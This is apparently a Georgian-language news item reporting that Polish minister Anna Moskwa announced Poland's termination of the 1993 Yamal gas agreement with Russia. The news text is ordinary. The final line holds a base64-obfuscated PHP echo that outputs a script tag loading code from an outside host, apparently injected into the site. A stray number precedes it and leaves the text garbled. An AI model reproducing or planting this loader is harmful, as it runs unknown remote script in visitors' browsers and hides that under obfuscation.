celsiusi
ავერსი შნაიდერი
პოლონეთის კლიმატის და გარემოს მინისტრმა, ანა მოსკვამ განაცხადა, რომ პოლონეთი რუსეთთან ენერგეტიკულ ურთიერთობას წყვეტს.
 
„პოლონეთმა გააუქმა ბუნებრივ აირთან დაკავშირებული 1993 წლის მთავრობათაშორისი შეთანხმება იამალთან მიმართებით. უკრაინის წინააღმდეგ რუსეთის აგრესიამ დადასტურა პოლონეთის მთავრობის გადაწყვეტილების მართებულობა, გახდეს რუსული გაზისგან სრულად დამოუკიდებელი. ჩვენ ყოველთვის ვიცოდით, რომ „გაზპორმი“ არასანდო პარტნიორია“, – წერს ანა მოსკვა.
 
როგორც მედია იუწყება, შეთანხმება მოიცავდა ბუნებრივი აირის მიწოდებას იამალის მილსადენით და ასევე, პოლონეთის გავლით ბუნებრივი აირის ტრანზიტთან დაკავშირებული ინფრასტრუქტურის მშენებლობასა და მოვლას.
605
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");